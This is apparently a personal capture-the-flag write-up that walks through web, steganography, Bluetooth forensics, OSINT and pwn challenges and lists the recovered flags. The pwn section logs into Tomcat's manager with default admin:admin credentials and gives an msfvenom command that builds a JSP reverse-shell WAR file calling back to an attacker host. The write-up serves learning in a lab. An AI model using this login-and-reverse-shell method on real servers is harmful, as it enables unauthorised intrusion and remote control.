This is where it all started I was watching an episode of The Boys when a friend of mine gave me a link to this CTF and asked me to play if I had the time, and I has plenty XD
Most of the challenges where based on reverse engineering binaries.
Web
The challenge had an HTML file when opened with a browser it gives a prompt to enter a password the end goal is to find the password which is the flag
Here is the code, By the looks of it I can see a load of variable declaration and looping by the hex thing looks promising by printing it on console it spits out some char codes
console.log("\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35");
Now we have a set of char codes which can then be converted using the String.fromCharCode function
print(String.fromCharCode(102, 108, 97,103,123,55,56,54,79,115,69,114,116,107,49,50,125));
Which returns the flag "flag{786OsErtk12}"
Steg
The challenge gives us a GIF of Captain America flying
(original image from challenge)
By running binwalk over it to check for hidden files we can see that there is a RAR file embedded in the GIF
After extracting the RAR file we have another image and a text file
Chasing and avenging the hydra's head Arnim Zola, captain america finally got control over the ship and crashed into the Arctic
going into a unconsciousness sleep of "steghide".
Releasing Next: Captain America "wintersoldier"
So we have steghide and wintersoldier which means only one thing.
and we have the flag flag{YzRwdDQxbl80bTNyMWM0}
Forensics
In this challenge we are given a btsnoop log file form which we have to find the unlock sequence and get the value which is the flag, We can view the log file on wireshark.
Now we have to find the Unlock Request , As the challenge description says the the unlock request is send through an app so the Source would be a Smart Phone and the destination is the Smart Lock
By Filtering the source and searching for a Value attribute I was able to figure out the Unlock request.
As the image shows a Send Write Request is generated from a Redmi4 to the Smart Lock with the handle of 0x0003 and as per the challenge description there should be 5 requests by counting them I knew this was it.Osint
The first thing is a GitHub profile by investigating I noticed that the
account is created at the time of the CTF and there is only one
repository by looking at the commit history there is a peculiar commit
By checking the Remove secret commit we have a flag
Pwn
In this challenge we have to download a VM and import it to virtual box in order to solve the challenge,Before that a Host only connection has to be made in order to access the box (which I didn't like) ,After importing the machine and staring it we have a static IP address.
By doing an NMAP on the IP address we can see that a port 8080 is open which is running Apache Tomcat
By checking the manager page we have a login prompt by trying admin:admin we are able to login to the app
Now we can upload a shell and gain code execution I used metasploit to generate the payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.x.x LPORT=xxxx -f war > shell.war
Now all we have to do is start an exploit handler on metasploit and upload the war file and execute it.